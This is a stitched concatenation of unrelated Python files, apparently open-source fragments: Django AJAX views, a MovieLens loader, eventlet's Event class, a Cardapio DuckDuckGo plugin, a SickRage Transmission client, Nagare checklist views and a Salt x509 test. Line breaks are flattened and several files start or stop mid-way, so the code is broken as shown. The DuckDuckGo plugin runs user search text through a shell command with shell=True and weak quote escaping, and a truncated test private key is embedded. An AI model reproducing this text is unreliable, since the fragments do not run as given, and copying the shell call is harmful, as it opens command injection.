(exc.ConnectionError, exc.BadRequest) as excinfo: module.fail_json(msg='Unable to launch job: {0}'.format(excinfo), changed=False) json_output['changed'] = result['changed'] module.exit_json(**json_output) if __name__ == '__main__': main()
# coding: utf-8 from django.views.generic import CreateView, UpdateView, DeleteView from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import render_to_string from django.template import RequestContext from django.core.serializers.json import DjangoJSONEncoder from django.conf import settings try: import json except ImportError: from django.utils import simplejson as json class JSONResponseMixin(object): """ This is a slightly modified version from django-braces project (https://github.com/brack3t/django-braces) """ content_type = None json_dumps_kwargs = None def get_content_type(self): return self.content_type or u"application/json" def get_json_dumps_kwargs(self): if self.json_dumps_kwargs is None: self.json_dumps_kwargs = {} self.json_dumps_kwargs.setdefault(u'ensure_ascii', False) return self.json_dumps_kwargs def render_json_response(self, context_dict, status=200): """ Limited serialization for shipping plain data. Do not use for models or other complex or custom objects. """ json_context = json.dumps( context_dict, cls=DjangoJSONEncoder, **self.get_json_dumps_kwargs() ).encode(u'utf-8') return HttpResponse( json_context, content_type=self.get_content_type(), status=status ) class AjaxFormMixin(JSONResponseMixin): message_template = None def pre_save(self): pass def post_save(self): pass def form_valid(self, form): """ If the request is ajax, save the form and return a json response. Otherwise return super as expected. """ self.object = form.save(commit=False) self.pre_save() self.object.save() if hasattr(form, 'save_m2m'): form.save_m2m() self.post_save() if self.request.is_ajax(): return self.render_json_response(self.get_success_result()) return HttpResponseRedirect(self.get_success_url()) def form_invalid(self, form): """ We have errors in the form. If ajax, return them as json. Otherwise, proceed as normal. """ if self.request.is_ajax(): return self.render_json_response(self.get_error_result(form)) return super(AjaxFormMixin, self).form_invalid(form) def get_message_template_context(self): return { 'instance': s
elf.object, 'object': self.object } def get_message_template_html(self): return render_to_string( self.message_template, self.get_message_template_context(), context_instance=RequestContext(self.request) ) def get_response_message(self): message = '' if self.message_template: message = self.get_messa
ge_template_html() return message def get_success_result(self): return {'status': 'ok', 'message': self.get_response_message()} def get_error_result(self, form): html = render_to_string( self.template_name, self.get_context_data(form=form), context_instance=RequestContext(self.request) ) return {'status': 'error', 'message': html} DEFAULT_FORM_TEMPLATE = getattr(settings, "FM_DEFAULT_FORM_TEMPLATE", "fm/form.html") class AjaxCreateView(AjaxFormMixin, CreateView): template_name = DEFAULT_FORM_TEMPLATE class AjaxUpdateView(AjaxFormMixin, UpdateView): template_name = DEFAULT_FORM_TEMPLATE class AjaxDeleteView(JSONResponseMixin, DeleteView): def pre_delete(self): pass def post_delete(self): pass def get_success_result(self): return {'status': 'ok'} def delete(self, request, *args, **kwargs): """ The same logic as in DeleteView but some hooks and JSON response in case of AJAX request """ self.object = self.get_object() self.pre_delete() self.object.delete() self.post_delete() if self.request.is_ajax(): return self.render_json_response(self.get_success_result()) success_url = self.get_success_url() return HttpResponseRedirect(success_url)
from django.apps import
AppConfig class IndexConfig(AppConfig): name = 'web.
index'
import pandas as pd from requests import get from StringIO import StringIO from pandas.io.common import ZipFile def get_movielens_data(local_file=None, get_genres=False): '''Downloads movielens data and sto
res it in pandas da
taframe. ''' if not local_file: #print 'Downloading data...' zip_file_url = 'http://files.grouplens.org/datasets/movielens/ml-1m.zip' zip_response = get(zip_file_url) zip_contents = StringIO(zip_response.content) #print 'Done.' else: zip_contents = local_file #print 'Loading data into memory...' with ZipFile(zip_contents) as zfile: zip_files = pd.Series(zfile.namelist()) zip_file = zip_files[zip_files.str.contains('ratings')].iat[0] zdata = zfile.read(zip_file) if 'latest' in zip_file: header = 0 else: header = None delimiter = ',' zdata = zdata.replace('::', delimiter) # makes data compatible with pandas c-engine ml_data = pd.read_csv(StringIO(zdata), sep=delimiter, header=header, engine='c', names=['userid', 'movieid', 'rating', 'timestamp'], usecols=['userid', 'movieid', 'rating']) if get_genres: zip_file = zip_files[zip_files.str.contains('movies')].iat[0] with zfile.open(zip_file) as zdata: if 'latest' in zip_file: delimiter = ',' else: delimiter = '::' genres_data = pd.read_csv(zdata, sep=delimiter, header=header, engine='python', names=['movieid', 'movienm', 'genres']) ml_genres = split_genres(genres_data) ml_data = (ml_data, ml_genres) return ml_data def split_genres(genres_data): genres_data.index.name = 'movie_idx' genres_stacked = genres_data.genres.str.split('|', expand=True).stack().to_frame('genreid') ml_genres = genres_data[['movieid', 'movienm']].join(genres_stacked).reset_index(drop=True) return ml_genres def filter_short_head(data, threshold=0.01): short_head = data.groupby('movieid', sort=False)['userid'].nunique() short_head.sort_values(ascending=False, inplace=True) ratings_perc = short_head.cumsum()*1.0/short_head.sum() movies_perc = pd.np.arange(1, len(short_head)+1, dtype=pd.np.float64) / len(short_head) long_tail_movies = ratings_perc[movies_perc > threshold].index return long_tail_movies
""" Copyright (c) 2015 Michael Bright and Bamboo HR LLC Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from flask import Response from rapid.lib.version import Version from rapid.lib import api_key_required from rapid.lib.utils import UpgradeUtil class UpgradeController(object): def __init__(self, flask
_app): self.flask_app = flask_app def configure_routing(self): self.flask_app.add_url_rule('/api/upgrade/<path:version>', 'upgrade_master', api_key_required(self.upgrade_master), methods=['POST']) def upgrade_master(self, version): worked = UpgradeUtil.upgrade_version(version, self.flask_app.rapid_config) return Response("It worked!" if worked else "It didn't work, version
{} restored!".format(Version.get_version()), status=200 if worked else 505)
#!/usr/local/bin/python3 import cgi print("Content-type: text/html") print(
''' <!DOCTYPE html> <html> <head> <title>Python</title> </head> <body> <h1>Python</h1> <p>Python</p> <p>This is the article for Pytho
n</p> </body> </html> ''')
# Copyright 2014 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import os import socket from unittest import mock from oslotest import base as test_base from oslo_service import systemd class SystemdTestCase(test_base.BaseTestCase): """Test case for Systemd service readiness.""" def test__abstractify(self): sock_name = '@fake_socket' res = systemd._abstractify(sock_name) self.assertEqual('\0{0}'.format(sock_name[1:]), res) @mock.patch.object(os, 'getenv', return_value='@fake_socket') def _test__sd_notify(self, getenv_mock, unset_env=False): self.ready = False self.closed = False class FakeSocket(object): def __init__(self, family, type): pass def connect(fs, socket): pass def close(fs): self.closed = True def sendall(fs, data): if data == b'READY=1': self.ready = True with mock.patch.object(socket, 'socket', new=FakeSocket): if unset_env
: systemd.notify_once() else: systemd.notify() self.assertTrue(self.ready) self.assertTrue(self.closed) def test_notify(self): self._test__sd_notify() def test_notify_once(self): os.environ['NOTIFY_SOCKET'] = '@fake_socket'
self._test__sd_notify(unset_env=True) self.assertRaises(KeyError, os.environ.__getitem__, 'NOTIFY_SOCKET') @mock.patch("socket.socket") def test_onready(self, sock_mock): recv_results = [b'READY=1', '', socket.timeout] expected_results = [0, 1, 2] for recv, expected in zip(recv_results, expected_results): if recv == socket.timeout: sock_mock.return_value.recv.side_effect = recv else: sock_mock.return_value.recv.return_value = recv actual = systemd.onready('@fake_socket', 1) self.assertEqual(expected, actual)
from __futur
e__ import print_function from eventlet import hubs from eventlet.support import greenlets as greenlet __all__ = ['Event'] class NOT_USED: def __repr__(self): return 'NOT_USED' NOT_USED = NOT_USED() class Event(object): """An abstraction where an arbitrary number of coroutines can wait for one event from another. Events are similar to a Queue
that can only hold one item, but differ in two important ways: 1. calling :meth:`send` never unschedules the current greenthread 2. :meth:`send` can only be called once; create a new event to send again. They are good for communicating results between coroutines, and are the basis for how :meth:`GreenThread.wait() <eventlet.greenthread.GreenThread.wait>` is implemented. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def baz(b): ... evt.send(b + 1) ... >>> _ = eventlet.spawn_n(baz, 3) >>> evt.wait() 4 """ _result = None _exc = None def __init__(self): self._waiters = set() self.reset() def __str__(self): params = (self.__class__.__name__, hex(id(self)), self._result, self._exc, len(self._waiters)) return '<%s at %s result=%r _exc=%r _waiters[%d]>' % params def reset(self): # this is kind of a misfeature and doesn't work perfectly well, # it's better to create a new event rather than reset an old one # removing documentation so that we don't get new use cases for it assert self._result is not NOT_USED, 'Trying to re-reset() a fresh event.' self._result = NOT_USED self._exc = None def ready(self): """ Return true if the :meth:`wait` call will return immediately. Used to avoid waiting for things that might take a while to time out. For example, you can put a bunch of events into a list, and then visit them all repeatedly, calling :meth:`ready` until one returns ``True``, and then you can :meth:`wait` on that one.""" return self._result is not NOT_USED def has_exception(self): return self._exc is not None def has_result(self): return self._result is not NOT_USED and self._exc is None def poll(self, notready=None): if self.ready(): return self.wait() return notready # QQQ make it return tuple (type, value, tb) instead of raising # because # 1) "poll" does not imply raising # 2) it's better not to screw up caller's sys.exc_info() by default # (e.g. if caller wants to calls the function in except or finally) def poll_exception(self, notready=None): if self.has_exception(): return self.wait() return notready def poll_result(self, notready=None): if self.has_result(): return self.wait() return notready def wait(self): """Wait until another coroutine calls :meth:`send`. Returns the value the other coroutine passed to :meth:`send`. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def wait_on(): ... retval = evt.wait() ... print("waited for {0}".format(retval)) >>> _ = eventlet.spawn(wait_on) >>> evt.send('result') >>> eventlet.sleep(0) waited for result Returns immediately if the event has already occured. >>> evt.wait() 'result' """ current = greenlet.getcurrent() if self._result is NOT_USED: self._waiters.add(current) try: return hubs.get_hub().switch() finally: self._waiters.discard(current) if self._exc is not None: current.throw(*self._exc) return self._result def send(self, result=None, exc=None): """Makes arrangements for the waiters to be woken with the result and then returns immediately to the parent. >>> from eventlet import event >>> import eventlet >>> evt = event.Event() >>> def waiter(): ... print('about to wait') ... result = evt.wait() ... print('waited for {0}'.format(result)) >>> _ = eventlet.spawn(waiter) >>> eventlet.sleep(0) about to wait >>> evt.send('a') >>> eventlet.sleep(0) waited for a It is an error to call :meth:`send` multiple times on the same event. >>> evt.send('whoops') Traceback (most recent call last): ... AssertionError: Trying to re-send() an already-triggered event. Use :meth:`reset` between :meth:`send` s to reuse an event object. """ assert self._result is NOT_USED, 'Trying to re-send() an already-triggered event.' self._result = result if exc is not None and not isinstance(exc, tuple): exc = (exc, ) self._exc = exc hub = hubs.get_hub() for waiter in self._waiters: hub.schedule_call_global( 0, self._do_send, self._result, self._exc, waiter) def _do_send(self, result, exc, waiter): if waiter in self._waiters: if exc is None: waiter.switch(result) else: waiter.throw(*exc) def send_exception(self, *args): """Same as :meth:`send`, but sends an exception to waiters. The arguments to send_exception are the same as the arguments to ``raise``. If a single exception object is passed in, it will be re-raised when :meth:`wait` is called, generating a new stacktrace. >>> from eventlet import event >>> evt = event.Event() >>> evt.send_exception(RuntimeError()) >>> evt.wait() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "eventlet/event.py", line 120, in wait current.throw(*self._exc) RuntimeError If it's important to preserve the entire original stack trace, you must pass in the entire :func:`sys.exc_info` tuple. >>> import sys >>> evt = event.Event() >>> try: ... raise RuntimeError() ... except RuntimeError: ... evt.send_exception(*sys.exc_info()) ... >>> evt.wait() Traceback (most recent call last): File "<stdin>", line 1, in <module> File "eventlet/event.py", line 120, in wait current.throw(*self._exc) File "<stdin>", line 2, in <module> RuntimeError Note that doing so stores a traceback object directly on the Event object, which may cause reference cycles. See the :func:`sys.exc_info` documentation. """ # the arguments and the same as for greenlet.throw return self.send(None, args)
from canvas.exceptions import ServiceError, ValidationError from canvas.economy import InvalidPurchase from drawquest imp
ort knobs from drawquest.apps.palettes.models import get_palette_by_name, all_palettes from drawquest.signals import balance_changed def balance(user): return int(user.kv.stickers.currency.get() or 0) def _adjust_balance(user, amount): if amount >= 0: user.kv.stickers.currency.increment(amount) else: result = user.kv.stickers.currency.increment_ifsufficient(amount) if not result['success']: raise
InvalidPurchase("Insufficient balance.") balance_changed.send(None, user=user) publish_balance(user) def publish_balance(user): user.redis.coin_channel.publish({'balance': balance(user)}) def credit(user, amount): _adjust_balance(user, amount) def debit(user, amount): _adjust_balance(user, -amount) def credit_first_quest(user): credit(user, knobs.REWARDS['first_quest']) def credit_quest_of_the_day_completion(user): credit(user, knobs.REWARDS['quest_of_the_day']) def credit_archived_quest_completion(user): credit(user, knobs.REWARDS['archived_quest']) def credit_personal_share(user): credit(user, knobs.REWARDS['personal_share']) def credit_streak(user, streak): credit(user, knobs.REWARDS['streak_{}'.format(streak)]) def credit_star(user): user.kv.stickers_received.increment(1) credit(user, knobs.REWARDS['star']) def purchase_palette(user, palette): if isinstance(palette, basestring): palette = get_palette_by_name(palette_name) if palette in user.redis.palettes: raise InvalidPurchase("You've already bought this palette.") debit(user, palette.cost) user.redis.palettes.unlock(palette)
blished by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ## Duck Duck Go search plugin by Clifton Mulkey ## Adapted from the Google Search plugin class CardapioPlugin(CardapioPluginInterface): author = _('Cardapio Team') name = _('DuckDuckGo') description = _('Perform quick DuckDuckGo searches') url = '' help_text = '' version = '1.0' plugin_api_version = 1.40 search_delay_type = 'remote' default_keyword = 'duck' category_name = _('DuckDuckGo Results') category_icon = 'system-search' icon = 'system-search' category_tooltip = _('Results found with DuckDuckGo') hide_from_sidebar = True def __init__(self, cardapio_proxy, category): self.c = cardapio_proxy try: from gio import File, Cancellable from urllib2 import quote from simplejson import loads from locale import getdefaultlocale from glib import GError except Exception, exception: self.c.write_to_log(self, 'Could not import certain modules', is_error=True) self.c.write_to_log(self, exception, is_error=True) self.loaded = False return self.File = File self.Cancellable = Cancellable self.quote = quote self.loads = loads self.getdefaultlocale = getdefaultlocale self.GError = GError self.query_url = r'http://www.duckduckgo.com/?q={0}&o=json' self.search_controller = self.Cancellable() self.action_command = "xdg-open 'http://duckduckgo.com/?q=%s'" self.action = { 'name': _('Show additional results'), 'tooltip': _('Show additional search results in your web browser'), 'icon name': 'system-search', 'type': 'callback', 'command': self.more_results_action, 'context menu': None, } self.loaded = True def search(self, text, result_limit): # TODO: I'm sure this is not the best way of doing remote procedure # calls, but I can't seem to find anything that is this easy to use and # compatible with gtk. Argh :( # TODO: we should really check if there's an interne
t connection before # proceeding... self.current_query = text text = self.quote(str(text)) # Is there a way to get the result_limit in the init method # so we don't have to assign it everytime search is called? self.result_limit = result_limit query = self.query_url.format(text) self.s
tream = self.File(query) self.search_controller.reset() self.stream.load_contents_async(self.handle_search_result, cancellable=self.search_controller) def cancel(self): if not self.search_controller.is_cancelled(): self.search_controller.cancel() def handle_search_result(self, gdaemonfile=None, response=None): # This function parses the results from the query # The results returned from DDG are a little convoluted # so we have to check for many different types of results here result_count = 0; try: response = self.stream.load_contents_finish(response)[0] except self.GError, e: # no need to worry if there's no response: maybe there's no internet # connection... self.c.handle_search_error(self, 'no response') return raw_results = self.loads(response) # print raw_results parsed_results = [] if 'Error' in raw_results: self.c.handle_search_error(self, raw_results['Error']) return # check for an abstract section try: if raw_results['Abstract']: item = { 'name': raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['AbstractSource'], raw_results['AbstractText']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['AbstractURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a definition section try: if raw_results['Definition']: item = { 'name': '%s (Definition)' % raw_results['Heading'], 'tooltip': '(%s) %s' % (raw_results['DefinitionSource'], raw_results['Definition']), 'icon name': 'text-html', 'type': 'xdg', 'command': raw_results['DefinitionURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for a related topics section try: if raw_results['RelatedTopics']: for raw_result in raw_results['RelatedTopics']: if result_count >= self.result_limit: break #some related topics have a 'Topics' sub list try: for result in raw_result['Topics']: if result_count >= self.result_limit: break item = { 'name': result['Text'], 'tooltip': result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: #otherwise the RelatedTopic is a single entry item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass # check for external results section try: if raw_results['Results']: for raw_result in raw_results['Results']: if result_count >= self.result_limit: break item = { 'name': raw_result['Text'], 'tooltip': raw_result['FirstURL'], 'icon name': 'text-html', 'type': 'xdg', 'command': raw_result['FirstURL'], 'context menu': None, } parsed_results.append(item) result_count += 1 except KeyError: pass if parsed_results: parsed_results.append(self.action) self.c.handle_search_result(self, parsed_results, self.current_query) def more_results_action(self, text): text = text.replace("'", r"\'") text = text.replace('"', r'\"') try: subprocess.Popen(self.action_command % text, shell=True) except OSError, e: self.c.write_to_log(self, 'Error launching plugin action.', is_error=True) self.c.write
# Author: Mr_Orange <mr_orange@hotmail.it> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import re import json from base64 import b64encode import sickbeard from .generic import GenericClient class TransmissionAPI(GenericClient): def __init__(self, host=None, username=None, password=None): super(TransmissionAPI, self).__init__('Transmission', host, username, password) if not self.host.endswith('/'): self.host = self.host + '/' if self.rpcurl.startswith('/'): self.rpcurl = self.rpcurl[1:] if self.rpcurl.endswith('/'): self.rpcurl = self.rpcurl[:-1] self.url = self.host + self.rpcurl + '/rpc' def _get_auth(self): post_data = json.dumps({'method': 'session-get', }) try: self.response = self.session.post(self.url, data=post_data.encode('utf-8'), timeout=120, verify=sickbeard.TORRENT_VERIFY_CERT) self.auth = re.search('X-Transmission-Session-Id:\s*(\w+)', self.response.text).group(1) except: return None self.session.headers.update({'x-transmission-session-id': self.auth}) #Validating Transmission authorization post_data = json.dumps({'arguments': {}, 'method': 'session-get', }) self._request(method='post', data=post_data) return self.auth def _add_torrent_uri(self, result): arguments = {'filename': result.url, 'paused': 1 if sickbeard.TORRENT_PAUSED else 0, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _add_torrent_file(self, result): arguments = {'metainfo': b64encode(result.content), 'paused': 1 if sickbeard.TORRENT_PAUSED else 0, 'download-dir': sickbeard.TORRENT_PATH } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-add', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_ratio(self, result): ratio = None if result.ratio: ratio = result.ratio mode = 0 if ratio: if float(ratio) == -1: ratio = 0 mode = 2 elif float(ratio) >= 0: ratio = float(ratio) mode = 1 # Stop seeding at seedRatioLimit arguments = {'ids': [result.hash], 'seedRatioLimit': ratio, 'seedRatioMode': mode } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" def _set_torrent_seed_time(self, result): if sickbeard.TORRENT_SEED_TIME and sickbeard.TORRENT_SEED_TIME != -1: time = int(60 * float(sickbeard.TORRENT_SEED_TIME)) arguments = {'ids': [result.hash], 'seedIdleLimit': time, 'seedIdleMode': 1 } post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" else: return Tru
e def _set_torrent_priority(self, result): arguments = {'ids': [result.hash]} if result.priority == -1: arguments['priority-low'] = [] elif result.priority == 1: # set high priority for all files in torrent arguments['priority-high'] = [] # move torrent to the top if the q
ueue arguments['queuePosition'] = 0 if sickbeard.TORRENT_HIGH_BANDWIDTH: arguments['bandwidthPriority'] = 1 else: arguments['priority-normal'] = [] post_data = json.dumps({'arguments': arguments, 'method': 'torrent-set', }) self._request(method='post', data=post_data) return self.response.json()['result'] == "success" api = TransmissionAPI()
#!/usr/bin/python import sys,os from email.Utils import COMMASPACE, formatdate from email.MIMEMultipart import MIMEMultipart from email.MIMEText import MIMEText from email.MIMEImage import MIMEImage from email.MIMEImage import MIMEImage from email.MIMEBase import MIMEBase from email import Encoders import smtplib import XmlDict function=sys.argv[1] user=sys.argv[2] filename=sys.argv[3] conf = XmlDict.loadXml("global.xml") for option in conf["menu"]["option"]: if ((option["type"].lower()==funct
ion.lower()) and (option["name"]==user)): option_selected = option msg = MIMEMultipart() msg['Subject'] = conf["subject"] msg['From'] = conf["source"] msg['To'] = CO
MMASPACE.join([option_selected["config"]]) msg['Date'] = formatdate(localtime=True) text = "Your scanner happely delivered this pdf to your mailbox.\n" msg.attach( MIMEText(text) ) part = MIMEBase('application', "pdf") part.set_payload( open(filename,"rb").read() ) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(filename) ) msg.attach(part) mailer = smtplib.SMTP(conf["smtp"]) #mailer.connect() mailer.sendmail(conf["source"],option_selected["config"] , msg.as_string()) mailer.close()
#-- # Copyright (c) 2012-2014 Net-ng. # All rights reserved. # # This software is licensed under the BSD License, as described in # the file LICENSE.txt, which you should have received as part of # this distribution. #-- from nagare import presentation, security, var, ajax from nagare.i18n import _ from comp import NewChecklistItem, ChecklistTitle, ChecklistItemTitle, Checklists, Checklist, ChecklistItem @presentation.render_for(NewChecklistItem) def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(u'') with h.form(class_='new-item-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Add item')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(text())) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) if self.focus: h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) self.focus = False return h.root @presentation.render_for(ChecklistTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" h << h.i(class_='icon-list') kw = {} kw['style'] = 'cursor: pointer;display: inline;' kw['onclick'] = h.a.action(comp.answer).get('onclick').replace('return', "") with h.div(class_='text-title', **kw): content = self.text or h.span(_('Edit title'), class_='show_onhover') h << content return h.root @presentation.render_for(ChecklistTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='title-form'): id_ = h.generate_id() h << h.i(class_='icon-list') h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(ChecklistItemTitle) def render_ChecklistTitle(self, h, comp, *args): """Render the title of the associated object""" return h.a(self.text).action(comp.answer) @presentation.render_for(ChecklistItemTitle, model='edit') def render_ChecklistTitle_edit(next_method, self, h, comp, *args): """Render the title of the associated object""" text = var.Var(self.text) with h.form(class_='item-title-form'): id_ = h.generate_id() h << h.input(type='text', value=text, id_=id_, placeholder=_(u'Checklist title')).action(text) with h.div(class_='btn-group'): h << h.button(h.i(class_='icon-checkmark'), class_='btn').action(lambda: comp.answer(self.change_text(text()))) h << h.button(h.i(class_='icon-cross'), class_='btn').action(comp.answer) h << h.script("YAHOO.util.Dom.get(%s).focus()" % ajax.py2js(id_)) return h.root @presentation.render_for(Checklists, 'button') def render_Checklists_button(self, h, comp, model): if security.has_permissions('checklist', self.parent): with h.a(class_='btn').action(self.add_checklist): h << h.i(class_='icon-list') h << _('Checklist') return h.root @presentation.render_for(Checklists) def render_Checklists(self, h, comp, model): if security.has_permissions('checklist', self.parent): # On drag and drop action = ajax.Update(action=self.reorder) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) # On items drag and drop action = ajax.Update(action=self.reorder_items) action = '%s;_a;%s=' % (h.add_sessionid_in_url(sep=';'), action._generate_replace(1, h)) h.head.javascript(h.generate_id(), '''function reorder_checklists_items(data) { nagare_getAndEval(%s + YAHOO.lang.JSON.stringify(data)); }''' % ajax.py2js(action)) id_ = h.generate_id() with h.div(class_='checklists', id=id_): for index, clist in enumerate(self.checklists): h << clist.on_answer(lambda v, index=index: self.delete_checklist(index)) h << h.script("""$(function() { $("#" + %(id)s).sortable({ placeholder: "ui-state-highlight", axis: "y", handle: ".icon-list", cursor: "move", stop: function( event, ui ) { reorder_checklists($('.checklist').map(function() { return this.id }).get()) } }); $(".checklists .checklist .content ul").sortable({ placeholder: "ui-state-highlight", cursor: "move", connectWith: ".checklists .checklist .content ul", dropOnEmpty: true, update: function(event, ui) { var data = { target: ui.item.closest('.checklist').attr('id'), index: ui.item.index(), id: ui.item.attr('id') } reorder_checklists_items(data); } }).disableSelection(); })""" % {'id': ajax.py2js(id_)}) return h.root @presentation.render_for(Checklists, 'badge') def render_Checklists_badge(self, h, comp, model): if self.checklists: h << h.span(h.i(class_='icon-list'), ' ', self.nb_items, u' / ', self.total_items, class_='label') return h.root @presentation.render_for(Checklist) def render_Checklist(self, h, comp, model): with h.div(id='checklist_%s' % self.id, class_='checklist'): with h.div(class_='title'): h << self.title if self.title.model != 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') with h.div(class_='content'): if self.items: h << comp.render(h, 'progress') with h.ul:
for index, item in enumerate(self.items): h << h.li(item.on_answer(lambda v, index=index: self.delete_item(index)), id='checklist_item_%s' % item().id) h << self.new_item return h.root @presentation.render_for(Checklist, 'progress') def render_Checklist_progress(self, h, comp, model): progress = self.progress with h.div(class_='progress progress-success'):
h << h.div(class_='bar', style='width:%s%%' % progress) h << h.span(progress, u'%', class_='percent') return h.root @presentation.render_for(ChecklistItem) def render_ChecklistItem(self, h, comp, model): h << h.a(h.i(class_='icon-checkbox-' + ('checked' if self.done else 'unchecked'))).action(self.set_done) h << h.span(self.title, class_='done' if self.done else '') if not self.title.model == 'edit': h << h.a(h.i(class_='icon-cross'), class_='delete').action(comp.answer, 'delete') return h.root
import tempfile import salt.utils.files from salt.modules import x509 as x509_mod from salt.states import x509 from tests.support.helpers import dedent from tests.support.mixins import LoaderModuleMockMixin from tests.support.mock import MagicMock from tests.support.unit import TestCase, skipIf try: import M2Crypto # pylint: disable=unused-import HAS_M2CRYPTO = True except ImportError: HAS_M2CRYPTO = False class X509TestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): return {x509: {"__opts__": {"fips_mode": False}}} def test_certificate_info_matches(self): cert_info = {"MD5 Finger Print": ""} required_info = {"MD5 Finger Print": ""} ret = x509._certificate_info_matches(cert_info, required_info) assert ret == (True, []) class X509FipsTestCase(TestCase, LoaderModuleMockMixin): def setup_loader_modules(self): self.file_managed_mock = MagicMock() self.file_managed_mock.return_value = {"changes": True} return { x509: { "__opts__": {"fips_mode": True}, "__salt__": { "x509.get_pem_entry": x509_mod.get_pem_entry, "x509.get_private_key_size": x509_mod.get_private_key_size, }, "__states__": {"file.managed": self.file_managed_mock}, } } @skipIf(not HAS_M2CRYPTO, "Skipping, M2Crypto is unavailable") def test_private_key_fips_mode(self): """ :return: """ test_key = dedent( """ -----BEGIN PRIVATE KEY----- MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDx7UUt0cPi5G51 FmRBhAZtZb5x6P0PFn7GwnLmSvLNhCsOcD/vq/yBUU62pknzmOjM5pgWTACZj66O GOFmWBg06v8+sqUbaF9PZ/CxQD5MogmQhYNgfyuopHWWgLXMub2hlP+15qGohkzg Tr/mXp2ohVAb6ihjqb7XV9MiZaLNVX+XWauM8SlhqXMiJyDUopEGbg2pLsHhIMcX 1twLlyDja+uDbCMZ4jDNB+wsWxTaPRH8KizfEabB1Cl+fdyD10pSAYcodOAnlkW+ G/DX2hwb/ZAM9B1SXTfZ3gzaIIbqXBEHcZQNXxHL7szBTVcOmfx/RPfOeRncytb9 Mit7RIBxAgMBAAECggEAD4Pi+uRIBsYVm2a7OURpURzEUPPbPtt3d/HCgqht1+ZR CJUEVK+X+wcm4Cnb9kZpL7LeMBfhtfdz/2LzGagurT4g7nlwg0h3TFVjJ0ryc+G0 cVNOsKKXPzKE5AkPH7kNw04V9Cl9Vpx+U6hZQEHzJHqgP5oNyw540cCtJriT700b fG1q3PYKWSkDwTiUnJTnVLybFIKQC6urxTeT2UWeiBadfDY7DjI4USfrQsqCfGMO uWPpOOJk5RIvw5r0Of2xvxV76xCgzVTkgtWjBRMTEkfeYx3019xKlQtAKoGbZd1T tF8DH0cDlnri4nG7YT8yYvx/LWVDg12E6IZij1X60QKBgQD7062JuQGEmTd99a7o 